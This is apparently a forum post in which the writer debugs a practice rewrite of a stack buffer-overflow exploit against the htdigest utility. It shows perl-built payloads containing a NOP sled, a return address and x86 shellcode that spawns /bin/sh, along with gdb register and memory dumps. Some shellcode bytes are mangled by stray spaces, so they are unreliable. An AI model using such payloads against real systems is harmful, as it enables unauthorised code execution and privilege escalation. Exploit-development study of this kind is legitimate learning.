Hi All,
my stack's going a bit wierd. I'm re-writing the htdigest exploit (http://seclists.org/lists/bugtraq/2005/May/0154.html)
as a practice. Anyway I do this

[root@localhost bin]# ./htdigest ./hohi `perl -e 'print "\x41"x286
.. "\xe9\xfb\xff\xbf" . "\x90"x30 .
"x31\xdb\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0 c\xb0\x0b\x8d\x4b
\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x 62\x69\x6e\x2f\x73
\x68"'` user

I get the following stack output

ecx 0x8050d28 134548776
edx 0x22d9 8921
ebx 0x41414141 1094795585
esp 0xbfffee50 0xbfffee50
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x41414141 1094795585
eip 0x41414141 0x41414141
eflags 0x10286 66182
cs 0x23 35
ss 0x2b 43
ds 0xc010002b -1072693205
es 0x2b 43

before on exactly the same buffer but without shellcode i had control of EIP, but when i added the shellcode i suddenly end up having EIP full of AAAA's , perhaps I jumped to the wrong address, but in the address i jumped
to i have a nopsled and all these 0xc2's which i don't think should be there.
Any ideas?

(gdb) x/bx 0xbffffbe9
0xbffffbe9: 0xc2
(gdb)
0xbffffbea: 0x90
(gdb)
0xbffffbeb: 0xc2
(gdb)
0xbffffbec: 0x90
(gdb)
0xbffffbed: 0xc2

dropped the \x41 for a nopsled to fill the buffer but the nopsled seems to corrupt ,or at least it is'nt a nopsled anymore.
but I know my problem, and now I'm hitting the
nopsled. I am with the program now and know what we are looking for
in the structure.
but the nopsled is corrupt, or at least it is'nt a nopsled anymore.

maximumbuffer(NOP's) - strlen(shellcode) - 4,
structure
[nopsssssssssssss][shellcode][retaddr]

[root@localhost bin]# ./htdigest ./hohi `perl -e 'print "\x90"x269
..
"\x31\xc0\xb0\x46\x31\xc9\xcd\x80\x80\xeb\x16\5b\x3 1\xc0\x88\x43\x07
\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x 53\x0c\xcd\x80\xe8
\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58\x 41\x41\x41\x42\x42
\x42\x42" . "\xc0\xfb\xff\xbf\x45"'` user

new info reg

ebx 0x90c290c2 -1866297150
esp 0xbfffdbf0 0xbfffdbf0
ebp 0x90c290c2 0x90c290c2
esi 0x90c290c2 -1866297150
edi 0x90c290c2 -1866297150
eip 0x90c290c2 0x90c290c2

this is no nopsled but we are in the right place, i think.
(gdb) x/bx 0xbffffbc0
0xbffffbc0: 0xc2
(gdb)
0xbffffbc1: 0x90
(gdb)
0xbffffbc2: 0xc2
(gdb)
0xbffffbc3: 0x90
(gdb)
0xbffffbc4: 0xc2
I tried again to find it using objdump but no luck
[root@localhost bin]# objdump -s core.1888 | grep "90909090"

Where's my nopsled??

Wish I could edit my posts rather than keep posting ;)
but AFAIK it's also not a non executeable stack either

EDIT
definately very wierd

I dont really know what is the problem. What I do know is that when you use \x90 its putting 2 bytes on the stack at the moment that you use \x90 in stead of \x41 you have to have twice more \x41 as when you use \x90

htdigest ./pikah `perl -e 'print "\x90"x163'` user
Adding user ������������������������������������ in realm
�������������������������������������������������� ��������������������������
�������������������������������������������������� ��������������������������
������������
New password:
Re-type new password:
Segmentation fault (core dumped)

htdigest ./pikah `perl -e 'print "\x41"x163'` user
Adding user user in realm
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAA
New password:
Re-type new password:
(no core dump)